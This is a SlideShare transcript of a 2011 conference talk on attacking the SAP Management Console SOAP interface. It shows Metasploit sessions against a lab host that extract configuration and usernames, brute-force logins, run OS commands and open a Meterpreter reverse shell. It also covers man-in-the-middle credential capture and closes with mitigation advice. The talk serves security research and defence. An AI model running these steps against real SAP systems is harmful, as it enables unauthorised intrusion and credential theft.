SAP (in)securityScrubbing SAP clean with SOAP        Chris John Riley
“THE WISEST MAN, IS HE WHO KNOWS, THAT HE   KNOWS NOTHING”             SOCRATES: APOLOGY, 21D
NOTAN EXPERT!
1)   Whats what2)   Information is king3)   Getting in the middle4)   Putting it all together5)   Stopping Bob!
WHAT’SWHAT
“…the worlds leading provider ofbusiness software, SAP (which stands for"Systems, Applications, and Products inData Proces...
Other people describe them as…“…the worlds leading repository ofbusiness critical information, SAP (whichstands for ”Secur...
Some rights reserved by TrevinC
IS IT REALLY THAT BAD?
Some rights reserved by Telstar Logistics
Some rights reserved by Telstar Logistics
So Many Reasons Vulnerabilties are a part of it!   Every system has it‘s vulnerabilities SAP installations often fall t...
“YOU CANT TEST THAT, ITS   BUSINESS CRITICAL!”             UNKNOWN PROJECT MANAGER
Some rights reserved by Telstar Logistics
SIMPLE OBJECTACCESS PROTOCOL
You’re getting SOAP all over my SAP!                               THIS TALK        SAP         Security     Netweaver    ...
A LITTLE BIT ABOUT SAPMANAGEMENT  CONSOLE
SAP MC Communications Default port 5<instance>13/14   50013 HTTP   50014 HTTPS Can use SSL   If it‘s configured   Mo...
SAP MC Communications Uses Basic authfor some functions    Yes... It‘s 2011    Yes... Companies still use Basic Auth M...
ENABLED BY DEFAULT…
ON ALL SAP SYSTEMS!
SAP MC MMC Snap-in
SAP MC JAVA Applet
INFORMATION  IS KING
“If theres one thing SAP MC loves,its giving away information“                                Quote by:                   ...
Show me the money!
Information is king Version information    Sure, HTTP headers give that!    Nothing new here... mostly Down to the pat...
Version Informationmsfauxiliary(sap_mgmt_con_version) > show optionsModule options (auxiliary/scanner/sap/sap_mgmt_con_ver...
Version Informationmsfauxiliary(sap_mgmt_con_version) > show optionsModule options (auxiliary/scanner/sap/sap_mgmt_con_ver...
Version Informationmsfauxiliary(sap_mgmt_con_version) > run[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface[+] [SAP...
Version Informationmsfauxiliary(sap_mgmt_con_version) > run[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface[+] [SAP...
Information is king Startup profile    Instance name    SAP System Name    SAP SID    SAP DB Schema    Paths    ....
Startup Profilemsfauxiliary(sap_mgmt_con_startprofile) > run[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface[+] [SA...
Startup Profilemsfauxiliary(sap_mgmt_con_startprofile) > run[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface[+] [SA...
Information is king Server / Instance Environment    Computername    Database Names      Database Type (Oracle, MaxDB,...
Environmentmsfauxiliary(sap_mgmt_con_getenv) > run[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface[*] COMPUTERNAME=...
Environmentmsfauxiliary(sap_mgmt_con_getenv) > run[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface[*] COMPUTERNAME=...
Information is king SAP Log/Tracefiles    SAP Startup Logs    Error / Debug Logs      Developer Traces    Security Lo...
Log/Trace Filesmsfauxiliary(sap_mgmt_con_listlogfiles) > run[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface  Filen...
Log/Trace Files<SAPControl:ReadDeveloperTraceResponse><name>E:usrsapNSPDVEBMGS00workdev_w0<name><item>trc file: "dev_w0", ...
ABAP Log File<SAPControl:ABAPReadSyslogResponse><log><item><Time>2011 10 14 15:06:18</Time><Text>SAP: ICM started on host ...
Information is king Extracting data from logfiles    Logfiles include usernames      Scrape for usernames      Instant...
Extract Users[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface[+] [SAP] Users Extracted: 10 entries extracted[+] [SA...
Extract Users[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface[+] [SAP] Users Extracted: 10 entries extracted[+] [SA...
Information is king Process Parameters    Output of the entire SAP configuration    Password Policies      Setup your ...
Process Parametersmsfauxiliary(sap_mgmt_con_getprocessparameter) > run[*] [SAP] Connecting to SAP MC on 172.16.15.128:5001...
Process Parametersmsfauxiliary(sap_mgmt_con_getprocessparameter) > run[*] [SAP] Connecting to SAP MC on 172.16.15.128:5001...
Process Parameters<SAPControl:GetProcessParameterResponse><parameter><item><name>DIR_AUDIT</name><group>System</group><des...
Process Parameters<SAPControl:GetProcessParameterResponse><parameter><item><name>DIR_AUDIT</name><group>System</group><des...
Information is king Useful Process Parameters     rsau/enabled     login/password_downward_compatibility     login/fai...
“I put a whitebox configuration audit in your blackbox penetration test, so you can whitebox SAP while you blackbox it!“  ...
Information overload All unauthenticated But you have to be IN the network right!   Right?
Bueller
Bueller
Bueller
2,700                                  Number of SAP servers2,675                           listening on public addresses2...
Some rights reserved by Crystl
GETTING INTHE MIDDLE
Basic auth is your friend!
SAP MC authentication
MAN IN THE MIDDLE…
LET ME COUNT  THE WAYS…
Getting in the middle Force Authentication   Basic Auth == Clear Text   Credentials FTW! Alter Requests   Do what YOU...
SAP MC authentication
SAP MC authentication
Getting in the middle 4 different options for SSL protection    Self Signed    Device Default (not an option for SAP)  ...
Getting in the middle Impersonate SSL    There‘s a module for that ;)    Creates a fake cert      As close to the orig...
PUTTING IT ALL  TOGETHER
OSExecute SAP MC generously offers OSExecute function    Valid username/password req.      That‘s handy!
USERNAME /PASSWORD?
MITM Using the force-auth method Check under the keyboard Post-it notes! Rubber hose method
Brute-Force Metasploit module    Set SAP SID for SAP specific checks Watchout for lockouts!    Denial of Service?
Brute Forcemsfauxiliary(sap_mgmt_con_brute_login) > set SAP_SID NSPmsfauxiliary(sap_mgmt_con_brute_login) > run[*]SAPSID s...
OSExecuteauxiliary(sap_..._osexec) > set RHOSTS 172.16.15.128auxiliary(sap_..._osexec) > set USERNAME sapservicenspauxilia...
THANKS, BUT WE WANTMETERPETER!
Getting Meterpreter Using tricks built into Metasploit     Encode Payload     Split it up into chucks     Shove it in ...
OSExecuteMeterpretermsfexploit(sap_mgmt_con_osexec_exploit) > exploit[*] Started reverse handler on 172.16.15.134:4444[*] ...
STOPPING  BOB!
WHY IS YOUR SAP MC ACCESSIBLE TO THE WORLD!
SLIGHTLY LESSHTTPS== BAD
Fixing the issues SAP Fix    SAP Note 1439348       Issue also discovered by Onapsis    No idea what it says!       S...
Next Steps More Research    Finish the MITM module      Force Auth works now      JAVA Applet deployment not so much  ...
Questions ?  http://c22.cccontact@c22.cc
Big Thanks The REAL SAP Security Researchers        Onapsis        DSecRG        Raul Siles        CYBSEC   SAP PSRT...
Thanks for coming     http://c22.cc   contact@c22.cc
Sorry for sucking    so bad!    http://c22.cc  contact@c22.cc
SAP (in)security: Scrubbing SAP clean with SOAP
SAP (in)security: Scrubbing SAP clean with SOAP
SAP (in)security: Scrubbing SAP clean with SOAP
SAP (in)security: Scrubbing SAP clean with SOAP
SAP (in)security: Scrubbing SAP clean with SOAP
SAP (in)security: Scrubbing SAP clean with SOAP
SAP (in)security: Scrubbing SAP clean with SOAP
SAP (in)security: Scrubbing SAP clean with SOAP
SAP (in)security: Scrubbing SAP clean with SOAP
SAP (in)security: Scrubbing SAP clean with SOAP
SAP (in)security: Scrubbing SAP clean with SOAP
SAP (in)security: Scrubbing SAP clean with SOAP
SAP (in)security: Scrubbing SAP clean with SOAP
SAP (in)security: Scrubbing SAP clean with SOAP
Upcoming SlideShare
Loading in …5
×

SAP (in)security: Scrubbing SAP clean with SOAP

5,262 views
5,187 views

Published on

Hashdays Conference (29th Oct. 2011)

SAP (in)security:
Scrubbing SAP clean with SOAP

----------
Abstract:
----------
At the heart of any large enterprise, lies a platform misunderstood and feared by all but the bravest systems administrators. Home to a wealth of information, and key to infinite wisdom. This platform is SAP. For years this system has been amongst the many "red pen" items on penetration tests and audits alike... but no more! We will no longer accept the cries of "Business critical, out-of-scope". The time for SAP has come, the cross-hairs of attackers are firmly focused on the soft underbelly that is ERM, and it's our duty to follow suit. Join me as we take the first steps into exploring SAP, extracting information and popping shells. Leave your Nessus license at the door! It's time to scrub this SAP system clean with SOAP!
----------

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
5,262
On SlideShare
0
From Embeds
0
Number of Embeds
144
Actions
Shares
0
Downloads
31
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide
  • Yeah… I said that!SAP is a perfect goal for attackers. All the companies crown jewels in once place!
  • In 2010 SAP released more than 900 fixes… SAP is a complex product, and complex products always have flaws. Research into coding flaws show 15-50 bugs per 1000 lines of delivered code… not all are security related, but that’s still a lot of bugs!
  • It’s not ALL SAPs fault… complex configurations user error maintaining backwards compatibilitytake your pick. In offering so much SAP are their own worst enemy.
  • If security never see it, how can they secure itMore importantly, if they don‘t understand it, how can they ever hope to secure it!
  • Think aboutTHAT logic for a second!I‘m pretty sure every security professional has heard that at one point or another
  • So what’s this SOAP thing then
  • Not a cleaning product!We‘ll be use it to scrub SAP clean howeverI‘m sure lots of you have heard of Web ServicesSimply XML over HTTP or HTTPSFlexible (can run over SMTP...)SO HOW DOES SOAP FIT INTO OUR SAP TOPIC
  • Yes it’s a sad sad world!SAP MC uses a range of unauthenticated requests, but some of the more fun functions require username/password authentication
  • Lots of cool dataLots of cool functionsLots of fun to be had!
  • There’s pages of this stuff… much too much for a slide… and much too much to make this stuff available for attackers!
  • dbms_typeThe database interface recognizes the type of the database system by the environment variable dbms_type.Possible values: ora, inf, db2, db4, db6, ada, mssOLDER VERSIONS of SAP can include environment variables such as MSSQL_USER
  • Effect of password policies on keyspace reduction openwallDifferent password compliance rules can reduce the overall keyspace considerably!
  • So I scanned a small country!
  • What do we have already- Full server environment Version info SAP SIDDatabase info valid SAP usernames trace and debug logs
  • Wait... SSL will save us!
  • Yep.. It’s a feature remember? But we’ve already covered how we could get that
  • OSExecute is all well and good...Run a single commandGet the response..
  • Block itFilter itRestrict it to administratorsYES this means internally as well!
  • SAP (in)security: Scrubbing SAP clean with SOAP

    1. 1. SAP (in)securityScrubbing SAP clean with SOAP Chris John Riley
    2. 2. “THE WISEST MAN, IS HE WHO KNOWS, THAT HE KNOWS NOTHING” SOCRATES: APOLOGY, 21D
    3. 3. NOTAN EXPERT!
    4. 4. 1) Whats what2) Information is king3) Getting in the middle4) Putting it all together5) Stopping Bob!
    5. 5. WHAT’SWHAT
    6. 6. “…the worlds leading provider ofbusiness software, SAP (which stands for"Systems, Applications, and Products inData Processing") delivers products andservices that help accelerate businessinnovation for our customers.”
    7. 7. Other people describe them as…“…the worlds leading repository ofbusiness critical information, SAP (whichstands for ”Security Aint [our] Problem")delivers products and services thathelpattackers gain access to criticalenterprise data.”
    8. 8. Some rights reserved by TrevinC
    9. 9. IS IT REALLY THAT BAD?
    10. 10. Some rights reserved by Telstar Logistics
    11. 11. Some rights reserved by Telstar Logistics
    12. 12. So Many Reasons Vulnerabilties are a part of it!  Every system has it‘s vulnerabilities SAP installations often fall to business  Not an operations problem  Financial data should be handled by the business  Security team never gets close to it!
    13. 13. “YOU CANT TEST THAT, ITS BUSINESS CRITICAL!” UNKNOWN PROJECT MANAGER
    14. 14. Some rights reserved by Telstar Logistics
    15. 15. SIMPLE OBJECTACCESS PROTOCOL
    16. 16. You’re getting SOAP all over my SAP! THIS TALK SAP Security Netweaver . SOAP
    17. 17. A LITTLE BIT ABOUT SAPMANAGEMENT CONSOLE
    18. 18. SAP MC Communications Default port 5<instance>13/14  50013 HTTP  50014 HTTPS Can use SSL  If it‘s configured  More on this later!
    19. 19. SAP MC Communications Uses Basic authfor some functions  Yes... It‘s 2011  Yes... Companies still use Basic Auth Most functions don‘t even use that!
    20. 20. ENABLED BY DEFAULT…
    21. 21. ON ALL SAP SYSTEMS!
    22. 22. SAP MC MMC Snap-in
    23. 23. SAP MC JAVA Applet
    24. 24. INFORMATION IS KING
    25. 25. “If theres one thing SAP MC loves,its giving away information“ Quote by: Me, just now!
    26. 26. Show me the money!
    27. 27. Information is king Version information  Sure, HTTP headers give that!  Nothing new here... mostly Down to the patch-level  Can you say “targeted attack“
    28. 28. Version Informationmsfauxiliary(sap_mgmt_con_version) > show optionsModule options (auxiliary/scanner/sap/sap_mgmt_con_version): Name Current Setting Required Description---- --------------- -------- ----------- Proxies no Use a proxy chain RHOSTS 172.16.15.128 yes The target address range RPORT 50013 yes The target port THREADS 1 yes The number of threads URI / no Path to the SAP MC VHOST no HTTP server virtual host
    29. 29. Version Informationmsfauxiliary(sap_mgmt_con_version) > show optionsModule options (auxiliary/scanner/sap/sap_mgmt_con_version): Name Current Setting Required Description---- --------------- -------- ----------- Proxies no Use a proxy chain RHOSTS 172.16.15.128 yes The target address range RPORT 50013 yes The target port THREADS 1 yes The number of threads URI / no Path to the SAP MC VHOST no HTTP server virtual host
    30. 30. Version Informationmsfauxiliary(sap_mgmt_con_version) > run[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface[+] [SAP] Version Number Extracted - 172.16.15.128:50013[+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel[+] [SAP] SID: NSP[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
    31. 31. Version Informationmsfauxiliary(sap_mgmt_con_version) > run[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface[+] [SAP] Version Number Extracted - 172.16.15.128:50013[+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel[+] [SAP] SID: NSP[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
    32. 32. Information is king Startup profile  Instance name  SAP System Name  SAP SID  SAP DB Schema  Paths  ....
    33. 33. Startup Profilemsfauxiliary(sap_mgmt_con_startprofile) > run[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface[+] [SAP] Startup Profile Extracted: WINXPSAP- TSTsapmntNSPSYSprofileSTART_DVEBMGS00_WINXPSAP -TST[*] SAPSYSTEMNAME = NSP[*] SAPGLOBALHOST = WINXPSAP-TST[*] SAPSYSTEM = 00[*] INSTANCE_NAME = DVEBMGS00[*] DIR_PROFILE = WINXPSAP-TSTsapmntNSPSYSprofile[*] _PF = $(DIR_PROFILE)NSP_DVEBMGS00_WINXPSAP-TST[*] dbs/ada/schema = SAPNSP
    34. 34. Startup Profilemsfauxiliary(sap_mgmt_con_startprofile) > run[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface[+] [SAP] Startup Profile Extracted: WINXPSAP- TSTsapmntNSPSYSprofileSTART_DVEBMGS00_WINXPSAP -TST[*] SAPSYSTEMNAME = NSP[*] SAPGLOBALHOST = WINXPSAP-TST[*] SAPSYSTEM = 00[*] INSTANCE_NAME =DVEBMGS00[*] DIR_PROFILE = WINXPSAP-TSTsapmntNSPSYSprofile[*] _PF = $(DIR_PROFILE)NSP_DVEBMGS00_WINXPSAP-TST[*] dbs/ada/schema = SAPNSP
    35. 35. Information is king Server / Instance Environment  Computername  Database Names  Database Type (Oracle, MaxDB, ...)  Full Server Environment Variable list!  Information overload  OMG why!
    36. 36. Environmentmsfauxiliary(sap_mgmt_con_getenv) > run[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface[*] COMPUTERNAME=WINXPSAP-TST[*] ComSpec=C:WINDOWSsystem32cmd.exe[*] DBMS_TYPE=ada[*] FP_NO_HOST_CHECK=NO[*] OS=Windows_NT[*] USERNAME=SAPServiceNSP[*] PSModulePath=C:windowssystem32PowerShell...[*] SAPEXE=E:usrsapNSPSYSexeucNTI386[*] TMP=E:usrsapNSPtmp
    37. 37. Environmentmsfauxiliary(sap_mgmt_con_getenv) > run[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface[*] COMPUTERNAME=WINXPSAP-TST[*] ComSpec=C:WINDOWSsystem32cmd.exe[*] DBMS_TYPE=ada[*] FP_NO_HOST_CHECK=NO[*] OS=Windows_NT[*] USERNAME=SAPServiceNSP[*] PSModulePath=C:windowssystem32PowerShell...[*] SAPEXE=E:usrsapNSPSYSexeucNTI386[*] TMP=E:usrsapNSPtmp
    38. 38. Information is king SAP Log/Tracefiles  SAP Startup Logs  Error / Debug Logs  Developer Traces  Security Logs SAP ABAPSysLog  SAP Startup Times  PIDs  Services + Status Info
    39. 39. Log/Trace Filesmsfauxiliary(sap_mgmt_con_listlogfiles) > run[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface Filename Size Timestamp -------- ---- ---------available.log 2268 2011 10 16 12:52:33dev_cp 4397 2011 04 19 10:30:48dev_disp 4612 2011 10 14 15:06:14dev_icm 6594 2011 10 14 15:07:38sapstart.log 629 2011 10 14 15:06:04sapstartsrv.log 754 2011 10 16 10:04:36 stderr1 903 2011 10 14 15:06:04
    40. 40. Log/Trace Files<SAPControl:ReadDeveloperTraceResponse><name>E:usrsapNSPDVEBMGS00workdev_w0<name><item>trc file: "dev_w0", trc level: 1, release: "720"</item><item>---------------------------------------------------</item><item>* ACTIVE TRACE LEVEL 1</item><item>M pid 3564</item><item>M DpSysAdmExtCreate: ABAP is active</item><item>M DpShMCreate: allocated sys_adm at 09A40048</item><item>M DpShMCreate: allocated wp_adm at 09A43020</item><item>M DpShMCreate:allocated tm_adm at 09A47E48</item>…
    41. 41. ABAP Log File<SAPControl:ABAPReadSyslogResponse><log><item><Time>2011 10 14 15:06:18</Time><Text>SAP: ICM started on host WINXPSAP-TST (PID: 3536)</Text><Severity>SAPControl-GREEN</Severity><item><Time>2011 10 14 15:06:12</Time><Text>SAP Basis: Active ICU Version 3.4; Compiled With ICU 3.4; Unicode Version 4.1</Text><Severity>SAPControl-GREEN</Severity></item>…
    42. 42. Information is king Extracting data from logfiles  Logfiles include usernames  Scrape for usernames  Instant brute-force user list!  #wimming! Just an example of the data availble
    43. 43. Extract Users[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface[+] [SAP] Users Extracted: 10 entries extracted[+] [SAP] Extracted User: SAPSYS[+] [SAP] Extracted User: TEST1[+] [SAP] Extracted User: TESTDEV[+] [SAP] Extracted User: ADMIN1[+] [SAP] Extracted User: SAPADM[+] [SAP] Extracted User: TEST2…
    44. 44. Extract Users[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface[+] [SAP] Users Extracted: 10 entries extracted[+] [SAP] Extracted User: SAPSYS[+] [SAP] Extracted User: TEST1[+] [SAP] Extracted User: TESTDEV[+] [SAP] Extracted User: ADMIN1[+] [SAP] Extracted User: SAPADM[+] [SAP] Extracted User: TEST2…
    45. 45. Information is king Process Parameters  Output of the entire SAP configuration  Password Policies  Setup your Brute-force just right ;)  Hash Types  Still supporting those old 8 char hashes?  Security Audit Log Enabled ?  rsau/enabled (default: 0)  Is anybody watching?
    46. 46. Process Parametersmsfauxiliary(sap_mgmt_con_getprocessparameter) > run[*] [SAP] Connecting to SAP MC on 172.16.15.128:50013[*] [SAP] Attempting to matche (?i-mx:^login/password)[SAP] Process ParametersName Value ------ ----------login/password_charset 1login/password_downwards_compatibility 1login/password_hash_algorithm encoding=RFC2307, algorithm=iSSHA-1, saltsize=96login/password_max_idle_productive 0
    47. 47. Process Parametersmsfauxiliary(sap_mgmt_con_getprocessparameter) > run[*] [SAP] Connecting to SAP MC on 172.16.15.128:50013[*] [SAP] Attempting to matche (?i-mx:^login/password)[SAP] Process ParametersName Value ------ ----------login/password_charset 1login/password_downwards_compatibility 1login/password_hash_algorithm encoding=RFC2307, algorithm=iSSHA-1, saltsize=96login/password_max_idle_productive 0
    48. 48. Process Parameters<SAPControl:GetProcessParameterResponse><parameter><item><name>DIR_AUDIT</name><group>System</group><description>Directory for security audit files</description><unit/><value>E:usrsapNSPDVEBMGS00log</value></item><item><name>login/fails_to_user_lock</name><group>Login</group><description>Number of invalid login attempts until user lock</description><unit/><value>5 </value></item>…
    49. 49. Process Parameters<SAPControl:GetProcessParameterResponse><parameter><item><name>DIR_AUDIT</name><group>System</group><description>Directory for security audit files</description><unit/><value>E:usrsapNSPDVEBMGS00log</value></item><item><name>login/fails_to_user_lock</name><group>Login</group><description>Number of invalid login attempts until user lock</description><unit/><value>5 </value></item>…
    50. 50. Information is king Useful Process Parameters  rsau/enabled  login/password_downward_compatibility  login/failed_user_auto_unlock  login/fails_to_user_lock  login/min_password_lng  login/password_charset  .... *Checkout consolut.com for a great list
    51. 51. “I put a whitebox configuration audit in your blackbox penetration test, so you can whitebox SAP while you blackbox it!“ Quote by: Me, just now!
    52. 52. Information overload All unauthenticated But you have to be IN the network right!  Right?
    53. 53. Bueller
    54. 54. Bueller
    55. 55. Bueller
    56. 56. 2,700 Number of SAP servers2,675 listening on public addresses2,6502,6252,6002,5752,5502,5252,500 Router Gateway SAP MC SAP MC (SSL)
    57. 57. Some rights reserved by Crystl
    58. 58. GETTING INTHE MIDDLE
    59. 59. Basic auth is your friend!
    60. 60. SAP MC authentication
    61. 61. MAN IN THE MIDDLE…
    62. 62. LET ME COUNT THE WAYS…
    63. 63. Getting in the middle Force Authentication  Basic Auth == Clear Text  Credentials FTW! Alter Requests  Do what YOU want Alter Responses
    64. 64. SAP MC authentication
    65. 65. SAP MC authentication
    66. 66. Getting in the middle 4 different options for SSL protection  Self Signed  Device Default (not an option for SAP)  Enterprise CA  You sign your own certs centrally  Externally signed  Diginotar to the rescue!  SAP also offer signing services
    67. 67. Getting in the middle Impersonate SSL  There‘s a module for that ;)  Creates a fake cert  As close to the original as possible  Useful SE options  Expired yesterday  Add CN names for ease of use
    68. 68. PUTTING IT ALL TOGETHER
    69. 69. OSExecute SAP MC generously offers OSExecute function  Valid username/password req.  That‘s handy!
    70. 70. USERNAME /PASSWORD?
    71. 71. MITM Using the force-auth method Check under the keyboard Post-it notes! Rubber hose method
    72. 72. Brute-Force Metasploit module  Set SAP SID for SAP specific checks Watchout for lockouts!  Denial of Service?
    73. 73. Brute Forcemsfauxiliary(sap_mgmt_con_brute_login) > set SAP_SID NSPmsfauxiliary(sap_mgmt_con_brute_login) > run[*]SAPSID set to NSP - Setting default SAP wordlist[*] Trying username:sapservicensp password:[-] [01/18] - failed to login as sapservicensp password: [*] Trying username:sapservicensp password:sapserviceNSP’[-] [02/18] - failed to login as sapadm password: [*] Trying username:nspadm password:…
    74. 74. OSExecuteauxiliary(sap_..._osexec) > set RHOSTS 172.16.15.128auxiliary(sap_..._osexec) > set USERNAME sapservicenspauxiliary(sap_..._osexec) > set PASSWORD Pr0d@dm1nauxiliary(sap_..._osexec) > set CMD hostnameauxiliary(sap_..._osexec) > run[*] [SAP] Connecting to SAP Mgmt Console SOAP Interface[+] [SAP] Command run as PID: 1240 Command output --------------WINXPSAP-TST
    75. 75. THANKS, BUT WE WANTMETERPETER!
    76. 76. Getting Meterpreter Using tricks built into Metasploit  Encode Payload  Split it up into chucks  Shove it in  Start it up!  Profit
    77. 77. OSExecuteMeterpretermsfexploit(sap_mgmt_con_osexec_exploit) > exploit[*] Started reverse handler on 172.16.15.134:4444[*] Command Stager - 7.42% done (7499/101079 bytes)...[*] Command Stager - 100.00% done (101079/101079 bytes)[*] Meterpretersession 1 opened(172.16.15.134:4444 -> 172.16.15.128:1144) at 2011-10-16 14:41:59 +0200meterpreter>getuidServer username: WINXPSAP-TSTSAPServiceNSP
    78. 78. STOPPING BOB!
    79. 79. WHY IS YOUR SAP MC ACCESSIBLE TO THE WORLD!
    80. 80. SLIGHTLY LESSHTTPS== BAD
    81. 81. Fixing the issues SAP Fix  SAP Note 1439348  Issue also discovered by Onapsis  No idea what it says!  SAP restrict ALL fix info to customers only
    82. 82. Next Steps More Research  Finish the MITM module  Force Auth works now  JAVA Applet deployment not so much  Look at SAP SSL implementation  SSL is a punching bag right now  Sleep
    83. 83. Questions ? http://c22.cccontact@c22.cc
    84. 84. Big Thanks The REAL SAP Security Researchers  Onapsis  DSecRG  Raul Siles  CYBSEC SAP PSRT DirtySec (You know who you are!) MacLemon for the PPT-fu All the people who helped make this happen
    85. 85. Thanks for coming http://c22.cc contact@c22.cc
    86. 86. Sorry for sucking so bad! http://c22.cc contact@c22.cc

    ×